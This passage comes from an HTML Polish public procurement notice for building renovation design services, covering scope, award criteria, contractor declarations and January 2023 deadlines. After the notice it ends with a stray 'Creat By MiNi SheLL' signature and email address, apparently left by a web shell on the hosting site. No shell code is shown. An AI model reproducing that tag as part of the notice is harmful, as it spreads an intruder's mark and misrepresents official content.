zapotrzebowania na paliwo gazowe i wystąpienie o warunki techniczne przyłączenia do sieci gazowej lub wystąpienie do PGNiG Energetyka Przemysłowa S.A. o warunki przyłączenia do sieci ciepłowniczej,<br/>15) specyfikacje techniczne wykonania i odbioru robót, <br/>16) kosztorysy inwestorskie (wykonanie aktualizacji kosztorysów inwestorskich w okresie 3 lat od daty protokolarnego przekazania dokumentacji),<br/>17) przedmiary robót wraz z zestawieniem materiałów z podziałem na poszczególne branże,<br/>18) zbiorcze zestawienie kosztów,<br/>19) uzyskanie pozwolenia na budowę bądź zgłoszenia zamiaru wykonania robót budowlanych,<br/>20) harmonogram wykonania robót budowlanych,<br/>21) w dokumentacji należy uwzględnić między innymi:<br/>a)	wymianę lub remont zadaszeń wejść do budynków, <br/>b)	wykonanie przebudowy i remontu klatki schodowej obejmującej między innymi wymianę instalacji elektrycznej, niskoprądowych oraz malowanie,<br/>c)	wykonanie hydroizolacji ścian fundamentowych do głębokości ich posadowienia. W przypadku konieczności: zaprojektowanie drenażu opaskowego oraz izolacji poziomej ścian piwnicznych,<br/>d)	zapewnienie urządzenia do przygotowania posiłków wraz z podłączeniem instalacji (w przypadku gdy piec węglowy lub kuchenka gazowa na gaz propan-butan były jedynymi urządzeniami do przygotowania posiłków),<br/>e)	zapewnienie możliwości przygotowania ciepłej wody użytkowej w każdym mieszkaniu,<br/>f)	zaprojektowanie instalacji centralnego ogrzewania w technologii rur stalowych łączonych systemem zaciskowym,<br/>g)	przełożenie anten satelitarnych na jeden maszt,<br/>h)	zapewnienie prawidłowej wentylacji w mieszkaniach, <br/>i)	dostosowanie mieszkań do aktualnych warunków technicznych w tym pustostanów,<br/>j)	w przypadku kotła gazowego: włączenia istniejącej sprawnej instalacji ciepłej wody użytkowej do projektowanego kotła gazowego lub w przypadku braku przyłączenie do projektowanej instalacji ciepłej wody użytkowej,<br/>k)	wymianę stolarki okiennej i drzwi wejściowych z dostosowaniem do aktualnych wymagań warunków technicznych,<br/>l)	zalecenie z przeglądów budynków.<br/><br/>Dla zadania nr 2 w dokumentacji należy uwzględnić:<br/>a)	wymianę lub wzmocnienie nadpalonych elementów więźby dachowej i deskowanie dachu - zalecenia z przeglądu technicznego,<br/>b)	rozbiórkę budynku gospodarczego.<br/>Szczegółowy zakres usługi określa Specyfikacja Warunków Zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 40431,15 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny oferty został określony w SWZ w rozdziale XXII: &#34;Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert&#34;.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty. Do przygotowania oferty zaleca się wykorzystanie Formularza oferty, którego wzór stanowi Załącznik nr 1 do SWZ. W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić wszystkie informacje wymagane w Formularzu oferty.<br/>2. Oświadczenie o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia publicznego. Wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 2 do SWZ.<br/>3. Oświadczenie, o którym mowa w pkt 2 składają odrębnie:<br/>Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy.<br/>4. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>5. Pełnomocnictwo złożone w sytuacji:<br/>1) Wykonawców wspólnie ubiegających się o udzielenie zamówienia – pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>2) podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich podpisania nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (np. wypisu z Krajowego rejestru sądowego) – pełnomocnictwo do podpisania oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia publicznego. Wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik nr 2 do SWZ. Oświadczenie, składają odrębnie każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku<br/>oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy.<br/>3. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy na zasadach określonych w § 14 i § 15 projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-13 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-13 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia zamawiający wykluczy wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz.835).<br/>Dotyczy sekcji IV 4.2.10.) Okres realizacji zamówienia albo umowy ramowej: Wykonawca zobowiązany jest realizować przedmiot zamówienia w terminie: (dotyczy zadania nr 1 i 2):<br/>210 dni od dnia zawarcia umowy w tym do 21 dni od dnia zawarcia umowy na dostarczenie koncepcji przebudowy oraz remontu budynku w zakresie układu funkcjonalnego oraz rozwiązań technicznych

Creat By MiNi SheLL
Email: jattceo@gmail.com